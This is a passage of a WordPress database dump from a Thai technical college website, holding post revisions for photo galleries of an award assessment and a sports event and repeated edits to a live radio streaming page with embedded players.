(457, 1, '2018-01-07 01:00:46', '2018-01-06 18:00:46', 'วิทยาลัยเทคนิคระยอง เข้ารับการประเมินองค์การมาตรฐานดีเด่น องค์การนักวิชาชีพในอนาคตแห่งประเทศไทย ระดับสถานศึกษาขนาดใหญ่ ระดับภาค ภาคตะวันออกและกรุงเทพมหานคร ประจำปีการศึกษา 2560 (รอบสอง) วันที่ 25 ธันวาคม 2560\r\n<p style=\"text-align: center;\"><a href=\"http://www.technicrayong.ac.th/wp-content/uploads/2018/01/audit-avt-2-2560-01.jpg\"><img src=\"http://www.technicrayong.ac.th/wp-content/uploads/2018/01/audit-avt-2-2560-01-300x223.jpg\" alt=\"\" width=\"300\" height=\"223\" /></a><a href=\"http://www.technicrayong.ac.th/wp-content/uploads/2018/01/audit-avt-2-2560-02.jpg\"><img src=\"http://www.technicrayong.ac.th/wp-content/uploads/2018/01/audit-avt-2-2560-02-300x223.jpg\" alt=\"\" width=\"300\" height=\"223\" /></a></p>\r\n<p style=\"text-align: center;\"><a href=\"http://www.technicrayong.ac.th/wp-content/uploads/2018/01/audit-avt-2-2560-03.jpg\"><img src=\"http://www.technicrayong.ac.th/wp-content/uploads/2018/01/audit-avt-2-2560-03-300x223.jpg\" alt=\"\" width=\"300\" height=\"223\" /></a><a href=\"http://www.technicrayong.ac.th/wp-content/uploads/2018/01/audit-avt-2-2560-04.jpg\"><img src=\"http://www.technicrayong.ac.th/wp-content/uploads/2018/01/audit-avt-2-2560-04-300x223.jpg\" alt=\"\" width=\"300\" height=\"223\" /></a></p>\r\n<p style=\"text-align: center;\"><a href=\"http://www.technicrayong.ac.th/wp-content/uploads/2018/01/audit-avt-2-2560-05.jpg\"><img src=\"http://www.technicrayong.ac.th/wp-content/uploads/2018/01/audit-avt-2-2560-05-300x223.jpg\" alt=\"\" width=\"300\" height=\"223\" /></a><a href=\"http://www.technicrayong.ac.th/wp-content/uploads/2018/01/audit-avt-2-2560-06.jpg\"><img src=\"http://www.technicrayong.ac.th/wp-content/uploads/2018/01/audit-avt-2-2560-06-300x223.jpg\" alt=\"\" width=\"300\" height=\"223\" /></a></p>\r\n<p style=\"text-align: center;\"><a href=\"http://www.technicrayong.ac.th/wp-content/uploads/2018/01/audit-avt-2-2560-07.jpg\"><img src=\"http://www.technicrayong.ac.th/wp-content/uploads/2018/01/audit-avt-2-2560-07-300x223.jpg\" alt=\"\" width=\"300\" height=\"223\" /></a><a href=\"http://www.technicrayong.ac.th/wp-content/uploads/2018/01/audit-avt-2-2560-08.jpg\"><img src=\"http://www.technicrayong.ac.th/wp-content/uploads/2018/01/audit-avt-2-2560-08-300x223.jpg\" alt=\"\" width=\"300\" height=\"223\" /></a></p>\r\n<p style=\"text-align: center;\"><a href=\"http://www.technicrayong.ac.th/wp-content/uploads/2018/01/audit-avt-2-2560-09.jpg\"><img src=\"http://www.technicrayong.ac.th/wp-content/uploads/2018/01/audit-avt-2-2560-09-300x223.jpg\" alt=\"\" width=\"300\" height=\"223\" /></a><a href=\"http://www.technicrayong.ac.th/wp-content/uploads/2018/01/audit-avt-2-2560-10.jpg\"><img src=\"http://www.technicrayong.ac.th/wp-content/uploads/2018/01/audit-avt-2-2560-10-300x223.jpg\" alt=\"\" width=\"300\" height=\"223\" /></a></p>', 'การประเมินองค์การมาตรฐานดีเด่น', 'รอบสอง ...', 'inherit', 'closed', 'closed', '', '342-revision-v1', '', '', '2018-01-07 01:00:46', '2018-01-06 18:00:46', '', 342, 'http://www.technicrayong.ac.th/342-revision-v1/', 0, 'revision', '', 0),
(459, 1, '2018-01-07 01:07:49', '2018-01-06 18:07:49', 'กิจกรรมแข่งขันกีฬาภายในสถานศึกษา \"เทคนิคระยองเกมส์\" ประจำปีการศึกษา 2560 ระหว่างวันที่ 14-24 ธันวาคม 2560 และกิจกรรมพิธีเปิด-ปิด ในวันอาทิตย์ที่ 24 ธันวาคม 2560\r\n<p style=\"text-align: center;\"><a href=\"http://www.technicrayong.ac.th/wp-content/uploads/2018/01/rtc-sport-2560-01.jpg\"><img src=\"http://www.technicrayong.ac.th/wp-content/uploads/2018/01/rtc-sport-2560-01-300x191.jpg\" alt=\"\" width=\"300\" height=\"191\" /></a><a href=\"http://www.technicrayong.ac.th/wp-content/uploads/2018/01/rtc-sport-2560-02.jpg\"><img src=\"http://www.technicrayong.ac.th/wp-content/uploads/2018/01/rtc-sport-2560-02-300x191.jpg\" alt=\"\" width=\"300\" height=\"191\" /></a></p>\r\n<p style=\"text-align: center;\"><a href=\"http://www.technicrayong.ac.th/wp-content/uploads/2018/01/rtc-sport-2560-03.jpg\"><img src=\"http://www.technicrayong.ac.th/wp-content/uploads/2018/01/rtc-sport-2560-03-300x191.jpg\" alt=\"\" width=\"300\" height=\"191\" /></a><a href=\"http://www.technicrayong.ac.th/wp-content/uploads/2018/01/rtc-sport-2560-04.jpg\"><img src=\"http://www.technicrayong.ac.th/wp-content/uploads/2018/01/rtc-sport-2560-04-300x191.jpg\" alt=\"\" width=\"300\" height=\"191\" /></a></p>\r\n<p style=\"text-align: center;\"><a href=\"http://www.technicrayong.ac.th/wp-content/uploads/2018/01/rtc-sport-2560-05.jpg\"><img src=\"http://www.technicrayong.ac.th/wp-content/uploads/2018/01/rtc-sport-2560-05-300x191.jpg\" alt=\"\" width=\"300\" height=\"191\" /></a><a href=\"http://www.technicrayong.ac.th/wp-content/uploads/2018/01/rtc-sport-2560-06.jpg\"><img src=\"http://www.technicrayong.ac.th/wp-content/uploads/2018/01/rtc-sport-2560-06-300x191.jpg\" alt=\"\" width=\"300\" height=\"191\" /></a></p>\r\n<p style=\"text-align: center;\"><a href=\"http://www.technicrayong.ac.th/wp-content/uploads/2018/01/rtc-sport-2560-07.jpg\"><img src=\"http://www.technicrayong.ac.th/wp-content/uploads/2018/01/rtc-sport-2560-07-300x191.jpg\" alt=\"\" width=\"300\" height=\"191\" /></a><a href=\"http://www.technicrayong.ac.th/wp-content/uploads/2018/01/rtc-sport-2560-08.jpg\"><img src=\"http://www.technicrayong.ac.th/wp-content/uploads/2018/01/rtc-sport-2560-08-300x191.jpg\" alt=\"\" width=\"300\" height=\"191\" /></a></p>\r\n<p style=\"text-align: center;\"><a href=\"http://www.technicrayong.ac.th/wp-content/uploads/2018/01/rtc-sport-2560-09.jpg\"><img src=\"http://www.technicrayong.ac.th/wp-content/uploads/2018/01/rtc-sport-2560-09-300x191.jpg\" alt=\"\" width=\"300\" height=\"191\" /></a><a href=\"http://www.technicrayong.ac.th/wp-content/uploads/2018/01/rtc-sport-2560-10.jpg\"><img src=\"http://www.technicrayong.ac.th/wp-content/uploads/2018/01/rtc-sport-2560-10-300x191.jpg\" alt=\"\" width=\"300\" height=\"191\" /></a></p>\r\n<p style=\"text-align: center;\"><a href=\"http://www.technicrayong.ac.th/wp-content/uploads/2018/01/rtc-sport-2560-11.jpg\"><img src=\"http://www.technicrayong.ac.th/wp-content/uploads/2018/01/rtc-sport-2560-11-300x191.jpg\" alt=\"\" width=\"300\" height=\"191\" /></a><a href=\"http://www.technicrayong.ac.th/wp-content/uploads/2018/01/rtc-sport-2560-12.jpg\"><img src=\"http://www.technicrayong.ac.th/wp-content/uploads/2018/01/rtc-sport-2560-12-300x191.jpg\" alt=\"\" width=\"300\" height=\"191\" /></a></p>\r\n<p style=\"text-align: center;\"><a href=\"http://www.technicrayong.ac.th/wp-content/uploads/2018/01/rtc-sport-2560-13.jpg\"><img src=\"http://www.technicrayong.ac.th/wp-content/uploads/2018/01/rtc-sport-2560-13-300x191.jpg\" alt=\"\" width=\"300\" height=\"191\" /></a><a href=\"http://www.technicrayong.ac.th/wp-content/uploads/2018/01/rtc-sport-2560-14.jpg\"><img src=\"http://www.technicrayong.ac.th/wp-content/uploads/2018/01/rtc-sport-2560-14-300x191.jpg\" alt=\"\" width=\"300\" height=\"191\" /></a></p>\r\n<p style=\"text-align: center;\"><a href=\"http://www.technicrayong.ac.th/wp-content/uploads/2018/01/rtc-sport-2560-15.jpg\"><img src=\"http://www.technicrayong.ac.th/wp-content/uploads/2018/01/rtc-sport-2560-15-300x191.jpg\" alt=\"\" width=\"300\" height=\"191\" /></a><a href=\"http://www.technicrayong.ac.th/wp-content/uploads/2018/01/rtc-sport-2560-16.jpg\"><img src=\"http://www.technicrayong.ac.th/wp-content/uploads/2018/01/rtc-sport-2560-16-300x191.jpg\" alt=\"\" width=\"300\" height=\"191\" /></a></p>\r\n<p style=\"text-align: center;\"><a href=\"http://www.technicrayong.ac.th/wp-content/uploads/2018/01/rtc-sport-2560-17.jpg\"><img src=\"http://www.technicrayong.ac.th/wp-content/uploads/2018/01/rtc-sport-2560-17-300x191.jpg\" alt=\"\" width=\"300\" height=\"191\" /></a><a href=\"http://www.technicrayong.ac.th/wp-content/uploads/2018/01/rtc-sport-2560-18.jpg\"><img src=\"http://www.technicrayong.ac.th/wp-content/uploads/2018/01/rtc-sport-2560-18-300x191.jpg\" alt=\"\" width=\"300\" height=\"191\" /></a></p>\r\n<p style=\"text-align: center;\"><a href=\"http://www.technicrayong.ac.th/wp-content/uploads/2018/01/rtc-sport-2560-19.jpg\"><img src=\"http://www.technicrayong.ac.th/wp-content/uploads/2018/01/rtc-sport-2560-19-300x191.jpg\" alt=\"\" width=\"300\" height=\"191\" /></a><a href=\"http://www.technicrayong.ac.th/wp-content/uploads/2018/01/rtc-sport-2560-20.jpg\"><img src=\"http://www.technicrayong.ac.th/wp-content/uploads/2018/01/rtc-sport-2560-20-300x191.jpg\" alt=\"\" width=\"300\" height=\"191\" /></a></p>', 'กิจกรรมแข่งขันกีฬาภายในสถานศึกษา \"เทคนิคระยองเกมส์\"', '\"เทคนิคระยองเกมส์\" ...', 'inherit', 'closed', 'closed', '', '320-revision-v1', '', '', '2018-01-07 01:07:49', '2018-01-06 18:07:49', '', 320, 'http://www.technicrayong.ac.th/320-revision-v1/', 0, 'revision', '', 0),
(468, 1, '2018-01-07 01:25:36', '2018-01-06 18:25:36', 'วิทยาลัยเทคนิคระยอง เข้ารับการประเมินองค์การมาตรฐานดีเด่น องค์การนักวิชาชีพในอนาคตแห่งประเทศไทย ระดับสถานศึกษาขนาดใหญ่ ระดับภาค ภาคตะวันออกและกรุงเทพมหานคร ประจำปีการศึกษา 2560 (รอบสอง) วันที่ 25 ธันวาคม 2560\r\n<p style=\"text-align: center;\"><a href=\"/wp-content/uploads/2018/01/audit-avt-2-2560-01.jpg\"><img src=\"/wp-content/uploads/2018/01/audit-avt-2-2560-01-300x223.jpg\" alt=\"\" width=\"300\" height=\"223\" /></a><a href=\"/wp-content/uploads/2018/01/audit-avt-2-2560-02.jpg\"><img src=\"/wp-content/uploads/2018/01/audit-avt-2-2560-02-300x223.jpg\" alt=\"\" width=\"300\" height=\"223\" /></a></p>\r\n<p style=\"text-align: center;\"><a href=\"/wp-content/uploads/2018/01/audit-avt-2-2560-03.jpg\"><img src=\"/wp-content/uploads/2018/01/audit-avt-2-2560-03-300x223.jpg\" alt=\"\" width=\"300\" height=\"223\" /></a><a href=\"/wp-content/uploads/2018/01/audit-avt-2-2560-04.jpg\"><img src=\"/wp-content/uploads/2018/01/audit-avt-2-2560-04-300x223.jpg\" alt=\"\" width=\"300\" height=\"223\" /></a></p>\r\n<p style=\"text-align: center;\"><a href=\"/wp-content/uploads/2018/01/audit-avt-2-2560-05.jpg\"><img src=\"/wp-content/uploads/2018/01/audit-avt-2-2560-05-300x223.jpg\" alt=\"\" width=\"300\" height=\"223\" /></a><a href=\"/wp-content/uploads/2018/01/audit-avt-2-2560-06.jpg\"><img src=\"/wp-content/uploads/2018/01/audit-avt-2-2560-06-300x223.jpg\" alt=\"\" width=\"300\" height=\"223\" /></a></p>\r\n<p style=\"text-align: center;\"><a href=\"/wp-content/uploads/2018/01/audit-avt-2-2560-07.jpg\"><img src=\"/wp-content/uploads/2018/01/audit-avt-2-2560-07-300x223.jpg\" alt=\"\" width=\"300\" height=\"223\" /></a><a href=\"/wp-content/uploads/2018/01/audit-avt-2-2560-08.jpg\"><img src=\"/wp-content/uploads/2018/01/audit-avt-2-2560-08-300x223.jpg\" alt=\"\" width=\"300\" height=\"223\" /></a></p>\r\n<p style=\"text-align: center;\"><a href=\"/wp-content/uploads/2018/01/audit-avt-2-2560-09.jpg\"><img src=\"/wp-content/uploads/2018/01/audit-avt-2-2560-09-300x223.jpg\" alt=\"\" width=\"300\" height=\"223\" /></a><a href=\"/wp-content/uploads/2018/01/audit-avt-2-2560-10.jpg\"><img src=\"/wp-content/uploads/2018/01/audit-avt-2-2560-10-300x223.jpg\" alt=\"\" width=\"300\" height=\"223\" /></a></p>', 'การประเมินองค์การมาตรฐานดีเด่น', 'รอบสอง ...', 'inherit', 'closed', 'closed', '', '342-autosave-v1', '', '', '2018-01-07 01:25:36', '2018-01-06 18:25:36', '', 342, 'http://www.technicrayong.ac.th/342-autosave-v1/', 0, 'revision', '', 0),
(485, 1, '2018-01-07 15:45:43', '2018-01-07 08:45:43', '<center><span style=\"color: #ff0000;\"><em><strong>Live</strong></em></span> <span style=\"color: #ff6600;\">R-Radio Network Rayong Technical College.</span>\r\n<span style=\"color: #0000ff;\"> ถ่ายทอดสดพิธีเปิด อวท.ระดับภาคตะวันออกและกรุงเทพมหานคร ครั้งที่ ๒๙ ปีการศึกษา ๒๕๖๐</span>\r\n<span style=\"color: #ff6600;\">วันที่ ๙ มกราคม ๒๕๖๑</span> <span style=\"color: #0000ff;\">ณ โรงแรมซันธารา เวลเนส รีสอร์ท จังหวัดฉะเชิงเทรา ตั้งแต่เวลา ๐๙.๐๐ น. เป็นต้นไป</span>\r\n<iframe src=\"http://wwww.technicrayong.ac.th/TT.php\" width=\"640\" height=\"400\" frameborder=\"0\" scrolling=\"no\"></iframe></center> ', 'Live R-Radio Network', '', 'publish', 'closed', 'closed', '', 'r-radio-network', '', '', '2018-01-09 01:36:32', '2018-01-08 18:36:32', '', 0, 'http://www.technicrayong.ac.th/?page_id=485', 0, 'page', '', 0),
(486, 1, '2018-01-07 15:45:43', '2018-01-07 08:45:43', '<center>\r\n<script type=\"text/javascript\" src=\"http://www.netdesignhost.com/streaming/jquery.js\"></script>\r\n<script type=\"text/javascript\" src=\"http://www.netdesignhost.com/streaming/flowplayer-3.2.4.min.js\"></script></center>\r\n<div id=\"player1\" style=\"width: 640px; height: 378px;\"></div>\r\n<script type=\"text/javascript\">\r\nflowplayer(\"player1\", \"http://www.netdesignhost.com/streaming/flowplayer-3.2.5.swf\",\r\n{\r\nclip:\r\n{\r\nurl: \"technicrayonglive\",\r\nprovider: \"rtmp\", \r\nbufferLength: \"15\",\r\ntype: \"video\"\r\n}, \r\nplugins: \r\n{\r\nrtmp: \r\n{\r\nurl: \"http://www.netdesignhost.com/streaming/flowplayer.rtmp-3.2.3.swf\",\r\nnetConnectionUrl:\"rtmp://live4.netdesignhost.com/technicrayonglive/\"\r\n}\r\n}\r\n});\r\n</script>', 'r-radio', '', 'inherit', 'closed', 'closed', '', '485-revision-v1', '', '', '2018-01-07 15:45:43', '2018-01-07 08:45:43', '', 485, 'http://www.technicrayong.ac.th/485-revision-v1/', 0, 'revision', '', 0),
(489, 1, '2018-01-07 19:03:27', '2018-01-07 12:03:27', '<div class=\"video-container\"><center>\n<iframe src=\"http://wwww.technicrayong.ac.th/TT.php\" width=\"640\" height=\"378\" frameborder=\"1\" scrolling=\"no\" allowfullscreen=\"allowfullscreen\"></iframe></center></div>\n\n<div id=\'player\'>\n <video width=\"352\" height=\"288\" src=\"http://live4.netdesignhost.com/technicrayonglive/technicrayonglive/playlist.m3u8\" controls autoplay>\n </video>\n </div>\n\n<video controls>\n <source src=\"http://live4.netdesignhost.com/technicrayonglive/technicrayonglive/playlist.m3u8\" type=\"application/x-mpegURL\">\n</video>\n', 'r-radio', '', 'inherit', 'closed', 'closed', '', '485-autosave-v1', '', '', '2018-01-07 19:03:27', '2018-01-07 12:03:27', '', 485, 'http://www.technicrayong.ac.th/485-autosave-v1/', 0, 'revision', '', 0),
(490, 1, '2018-01-07 16:12:58', '2018-01-07 09:12:58', '<center>\r\n<script type=\"text/javascript\" src=\"http://www.netdesignhost.com/streaming/jquery.js\"></script>\r\n<script type=\"text/javascript\" src=\"http://www.netdesignhost.com/streaming/flowplayer-3.2.4.min.js\"></script>\r\n<div id=\"player1\" style=\"width:640px;height:378px\"></div>\r\n<script type=\"text/javascript\">\r\nflowplayer(\"player1\", \"http://www.netdesignhost.com/streaming/flowplayer-3.2.5.swf\",\r\n{\r\nclip:\r\n{\r\nurl: \"technicrayonglive\",\r\nprovider: \"rtmp\", \r\nbufferLength: \"15\",\r\ntype: \"video\"\r\n}, \r\nplugins: \r\n{\r\nrtmp: \r\n{\r\nurl: \"http://www.netdesignhost.com/streaming/flowplayer.rtmp-3.2.3.swf\",\r\nnetConnectionUrl:\"rtmp://live4.netdesignhost.com/technicrayonglive/\"\r\n}\r\n}\r\n});\r\n</script>\r\n</center>\r\n', 'r-radio', '', 'inherit', 'closed', 'closed', '', '485-revision-v1', '', '', '2018-01-07 16:12:58', '2018-01-07 09:12:58', '', 485, 'http://www.technicrayong.ac.th/485-revision-v1/', 0, 'revision', '', 0),
(506, 1, '2018-01-07 17:01:03', '2018-01-07 10:01:03', '<center>\r\n<iframe src=\"http://wwww.technicrayong.ac.th/TT.php\" frameborder=\"0\" scrolling=\"no\" allowtransparency=\"true\" width=\"640\" height=\"400\"></iframe>\r\n</center>', 'r-radio', '', 'inherit', 'closed', 'closed', '', '485-revision-v1', '', '', '2018-01-07 17:01:03', '2018-01-07 10:01:03', '', 485, 'http://www.technicrayong.ac.th/485-revision-v1/', 0, 'revision', '', 0),
(508, 1, '2018-01-07 17:10:13', '2018-01-07 10:10:13', '<center>\r\n<iframe src=\"http://wwww.technicrayong.ac.th/TT.php\" frameborder=\"0\" scrolling=\"no\" allowtransparency=\"true\" width=\"640\" height=\"378\" allowfullscreen></iframe>\r\n</center>\r\n\r\n<iframe src=\"//www.youtube.com/embed/KMYrIi_Mt8A\" allowfullscreen></iframe>', 'r-radio', '', 'inherit', 'closed', 'closed', '', '485-revision-v1', '', '', '2018-01-07 17:10:13', '2018-01-07 10:10:13', '', 485, 'http://www.technicrayong.ac.th/485-revision-v1/', 0, 'revision', '', 0),
(509, 1, '2018-01-07 17:11:01', '2018-01-07 10:11:01', '<center>\r\n<iframe src=\"http://wwww.technicrayong.ac.th/TT.php\" frameborder=\"0\" scrolling=\"no\" allowtransparency=\"true\" allowfullscreen></iframe>\r\n</center>\r\n\r\n<iframe src=\"//www.youtube.com/embed/KMYrIi_Mt8A\" allowfullscreen></iframe>', 'r-radio', '', 'inherit', 'closed', 'closed', '', '485-revision-v1', '', '', '2018-01-07 17:11:01', '2018-01-07 10:11:01', '', 485, 'http://www.technicrayong.ac.th/485-revision-v1/', 0, 'revision', '', 0),
(510, 1, '2018-01-07 17:17:31', '2018-01-07 10:17:31', '<center>\r\n<iframe src=\"http://wwww.technicrayong.ac.th/TT.php\" frameborder=\"0\" scrolling=\"no\" allowtransparency=\"true\" allowfullscreen></iframe>\r\n</center>\r\n\r\n', 'r-radio', '', 'inherit', 'closed', 'closed', '', '485-revision-v1', '', '', '2018-01-07 17:17:31', '2018-01-07 10:17:31', '', 485, 'http://www.technicrayong.ac.th/485-revision-v1/', 0, 'revision', '', 0),
(511, 1, '2018-01-07 17:20:29', '2018-01-07 10:20:29', '<center>\r\n<iframe width=\"560\" height=\"315\" src=\"http://wwww.technicrayong.ac.th/TT.php\" allowfullscreen></iframe>\r\n</center>\r\n\r\n', 'r-radio', '', 'inherit', 'closed', 'closed', '', '485-revision-v1', '', '', '2018-01-07 17:20:29', '2018-01-07 10:20:29', '', 485, 'http://www.technicrayong.ac.th/485-revision-v1/', 0, 'revision', '', 0),
(512, 1, '2018-01-07 17:22:50', '2018-01-07 10:22:50', '<center>\r\n<iframe width=\"560\" height=\"315\" src=\"http://wwww.technicrayong.ac.th/TT.php\" allowfullscreen></iframe>\r\n\r\n<iframe src=\"http://wwww.technicrayong.ac.th/TT.php\" frameborder=\"0\" scrolling=\"no\" allowtransparency=\"true\" width=\"640\" height=\"378\" allowfullscreen></iframe>\r\n\r\n</center>\r\n\r\n', 'r-radio', '', 'inherit', 'closed', 'closed', '', '485-revision-v1', '', '', '2018-01-07 17:22:50', '2018-01-07 10:22:50', '', 485, 'http://www.technicrayong.ac.th/485-revision-v1/', 0, 'revision', '', 0),
(513, 1, '2018-01-07 17:37:03', '2018-01-07 10:37:03', '<center>\r\n<iframe width=\"560\" height=\"315\" src=\"http://wwww.technicrayong.ac.th/TT.php\" allowfullscreen></iframe>\r\n\r\n<iframe src=\"http://wwww.technicrayong.ac.th/TT.php\" frameborder=\"0\" scrolling=\"no\" allowtransparency=\"true\" width=\"100%\" allowfullscreen></iframe>\r\n\r\n</center>\r\n\r\n', 'r-radio', '', 'inherit', 'closed', 'closed', '', '485-revision-v1', '', '', '2018-01-07 17:37:03', '2018-01-07 10:37:03', '', 485, 'http://www.technicrayong.ac.th/485-revision-v1/', 0, 'revision', '', 0),
(514, 1, '2018-01-07 17:37:32', '2018-01-07 10:37:32', '<center>\r\n<iframe width=\"560\" height=\"315\" src=\"http://wwww.technicrayong.ac.th/TT.php\" allowfullscreen></iframe>\r\n\r\n<iframe src=\"http://wwww.technicrayong.ac.th/TT.php\" frameborder=\"1\" scrolling=\"no\" allowtransparency=\"true\" width=\"100%\" allowfullscreen></iframe>\r\n\r\n</center>\r\n\r\n', 'r-radio', '', 'inherit', 'closed', 'closed', '', '485-revision-v1', '', '', '2018-01-07 17:37:32', '2018-01-07 10:37:32', '', 485, 'http://www.technicrayong.ac.th/485-revision-v1/', 0, 'revision', '', 0),
(515, 1, '2018-01-07 17:41:31', '2018-01-07 10:41:31', '<center>\r\n<iframe width=\"560\" height=\"315\" src=\"http://wwww.technicrayong.ac.th/TT.php\" allowfullscreen></iframe>\r\n\r\n<iframe src=\"http://wwww.technicrayong.ac.th/TT.php\" frameborder=\"1\" scrolling=\"no\" allowtransparency=\"true\" width=\"100%\" height=\"auto\" allowfullscreen></iframe>\r\n\r\n</center>\r\n\r\n', 'r-radio', '', 'inherit', 'closed', 'closed', '', '485-revision-v1', '', '', '2018-01-07 17:41:31', '2018-01-07 10:41:31', '', 485, 'http://www.technicrayong.ac.th/485-revision-v1/', 0, 'revision', '', 0),
(516, 1, '2018-01-07 17:46:04', '2018-01-07 10:46:04', '<center>\r\n<iframe width=\"560\" height=\"315\" src=\"http://wwww.technicrayong.ac.th/TT.php\" allowfullscreen></iframe>\r\n\r\n<iframe src=\"http://wwww.technicrayong.ac.th/TT.php\" frameborder=\"1\" scrolling=\"no\" allowtransparency=\"true\" style=\"height: auto;width: 100%\" allowfullscreen></iframe>\r\n\r\n</center>\r\n\r\n', 'r-radio', '', 'inherit', 'closed', 'closed', '', '485-revision-v1', '', '', '2018-01-07 17:46:04', '2018-01-07 10:46:04', '', 485, 'http://www.technicrayong.ac.th/485-revision-v1/', 0, 'revision', '', 0),
(517, 1, '2018-01-07 17:46:34', '2018-01-07 10:46:34', '<center>\r\n<iframe width=\"560\" height=\"315\" src=\"http://wwww.technicrayong.ac.th/TT.php\" allowfullscreen></iframe>\r\n\r\n<iframe src=\"http://wwww.technicrayong.ac.th/TT.php\" frameborder=\"1\" scrolling=\"no\" allowtransparency=\"true\" style=\"height: 50%;width: 100%\" allowfullscreen></iframe>\r\n\r\n</center>\r\n\r\n', 'r-radio', '', 'inherit', 'closed', 'closed', '', '485-revision-v1', '', '', '2018-01-07 17:46:34', '2018-01-07 10:46:34', '', 485, 'http://www.technicrayong.ac.th/485-revision-v1/', 0, 'revision', '', 0),
(518, 1, '2018-01-07 17:55:44', '2018-01-07 10:55:44', '<div class=\"video-container\">\r\n<center>\r\n<iframe src=\"http://www.r-radionetwork.com/website/station/iframe/129/0\" frameborder=\"0\" scrolling=\"no\" allowtransparency=\"true\" width=\"640\" height=\"378\"></iframe>\r\n</center>\r\n</div>\r\n\r\n', 'r-radio', '', 'inherit', 'closed', 'closed', '', '485-revision-v1', '', '', '2018-01-07 17:55:44', '2018-01-07 10:55:44', '', 485, 'http://www.technicrayong.ac.th/485-revision-v1/', 0, 'revision', '', 0),
(519, 1, '2018-01-07 17:56:33', '2018-01-07 10:56:33', '<div class=\"video-container\">\r\n<center>\r\n<iframe src=\"http://wwww.technicrayong.ac.th/TT.php\" frameborder=\"0\" scrolling=\"no\" allowtransparency=\"true\" width=\"640\" height=\"378\"></iframe>\r\n</center>\r\n</div>\r\n\r\n', 'r-radio', '', 'inherit', 'closed', 'closed', '', '485-revision-v1', '', '', '2018-01-07 17:56:33', '2018-01-07 10:56:33', '', 485, 'http://www.technicrayong.ac.th/485-revision-v1/', 0, 'revision', '', 0),
(520, 1, '2018-01-07 17:58:13', '2018-01-07 10:58:13', '<div class=\"video-container\">\r\n<center>\r\n<iframe src=\"http://wwww.technicrayong.ac.th/TT.php\" frameborder=\"1\" scrolling=\"no\" allowtransparency=\"true\" width=\"640\" height=\"378\"></iframe>\r\n</center>\r\n</div>\r\n\r\n', 'r-radio', '', 'inherit', 'closed', 'closed', '', '485-revision-v1', '', '', '2018-01-07 17:58:13', '2018-01-07 10:58:13', '', 485, 'http://www.technicrayong.ac.th/485-revision-v1/', 0, 'revision', '', 0),
(521, 1, '2018-01-07 18:03:41', '2018-01-07 11:03:41', '<div class=\"video-container\">\r\n<center>\r\n<iframe src=\"http://wwww.technicrayong.ac.th/TT.php\" frameborder=\"1\" scrolling=\"no\" allowtransparency=\"true\" width=\"640\" height=\"378\" allowfullscreen=\"\"></iframe>\r\n</center>\r\n</div>\r\n\r\n', 'r-radio', '', 'inherit', 'closed', 'closed', '', '485-revision-v1', '', '', '2018-01-07 18:03:41', '2018-01-07 11:03:41', '', 485, 'http://www.technicrayong.ac.th/485-revision-v1/', 0, 'revision', '', 0),
(522, 1, '2018-01-07 18:07:12', '2018-01-07 11:07:12', '[iframely]http://wwww.technicrayong.ac.th/TT.php[/iframely]\r\n\r\n<div class=\"video-container\">\r\n<center>\r\n<iframe src=\"http://wwww.technicrayong.ac.th/TT.php\" frameborder=\"1\" scrolling=\"no\" allowtransparency=\"true\" width=\"640\" height=\"378\" allowfullscreen=\"\"></iframe>\r\n</center>\r\n</div>\r\n\r\n', 'r-radio', '', 'inherit', 'closed', 'closed', '', '485-revision-v1', '', '', '2018-01-07 18:07:12', '2018-01-07 11:07:12', '', 485, 'http://www.technicrayong.ac.th/485-revision-v1/', 0, 'revision', '', 0),
(523, 1, '2018-01-07 18:09:40', '2018-01-07 11:09:40', '[iframely]<iframe src=\"http://wwww.technicrayong.ac.th/TT.php\" width=\"640\" height=\"378\" frameborder=\"1\" scrolling=\"no\" allowfullscreen=\"allowfullscreen\"></iframe>[/iframely]\r\n<div class=\"video-container\"><center>\r\n<iframe src=\"http://wwww.technicrayong.ac.th/TT.php\" width=\"640\" height=\"378\" frameborder=\"1\" scrolling=\"no\" allowfullscreen=\"allowfullscreen\"></iframe></center></div>', 'r-radio', '', 'inherit', 'closed', 'closed', '', '485-revision-v1', '', '', '2018-01-07 18:09:40', '2018-01-07 11:09:40', '', 485, 'http://www.technicrayong.ac.th/485-revision-v1/', 0, 'revision', '', 0),
(524, 1, '2018-01-07 18:10:16', '2018-01-07 11:10:16', '<div class=\"video-container\"><center>\r\n<iframe src=\"http://wwww.technicrayong.ac.th/TT.php\" width=\"640\" height=\"378\" frameborder=\"1\" scrolling=\"no\" allowfullscreen=\"allowfullscreen\"></iframe></center></div>', 'r-radio', '', 'inherit', 'closed', 'closed', '', '485-revision-v1', '', '', '2018-01-07 18:10:16', '2018-01-07 11:10:16', '', 485, 'http://www.technicrayong.ac.th/485-revision-v1/', 0, 'revision', '', 0),
(526, 1, '2018-01-07 18:21:22', '2018-01-07 11:21:22', '<div class=\"video-container\"><center>\r\n<iframe src=\"http://wwww.technicrayong.ac.th/TT.php\" width=\"640\" height=\"378\" frameborder=\"1\" scrolling=\"no\" allowfullscreen=\"allowfullscreen\"></iframe></center></div>\r\n\r\n[fvplayer src=\"r-radio\" rtmp=\"live4.netdesignhost.com\" rtmp_path=\"technicrayonglive\" splash=\"/wp-content/uploads/2018/01/Screenshot-65.png\"]', 'r-radio', '', 'inherit', 'closed', 'closed', '', '485-revision-v1', '', '', '2018-01-07 18:21:22', '2018-01-07 11:21:22', '', 485, 'http://www.technicrayong.ac.th/485-revision-v1/', 0, 'revision', '', 0),
(527, 1, '2018-01-07 18:23:15', '2018-01-07 11:23:15', '<div class=\"video-container\"><center>\r\n<iframe src=\"http://wwww.technicrayong.ac.th/TT.php\" width=\"640\" height=\"378\" frameborder=\"1\" scrolling=\"no\" allowfullscreen=\"allowfullscreen\"></iframe></center></div>\r\n', 'r-radio', '', 'inherit', 'closed', 'closed', '', '485-revision-v1', '', '', '2018-01-07 18:23:15', '2018-01-07 11:23:15', '', 485, 'http://www.technicrayong.ac.th/485-revision-v1/', 0, 'revision', '', 0),
(530, 1, '2018-01-07 18:34:03', '2018-01-07 11:34:03', '<div class=\"video-container\"><center>\r\n<iframe src=\"http://wwww.technicrayong.ac.th/TT.php\" width=\"640\" height=\"378\" frameborder=\"1\" scrolling=\"no\" allowfullscreen=\"allowfullscreen\"></iframe></center><center>[Spider_Video_Player id=\"1\"]</center></div>', 'r-radio', '', 'inherit', 'closed', 'closed', '', '485-revision-v1', '', '', '2018-01-07 18:34:03', '2018-01-07 11:34:03', '', 485, 'http://www.technicrayong.ac.th/485-revision-v1/', 0, 'revision', '', 0),
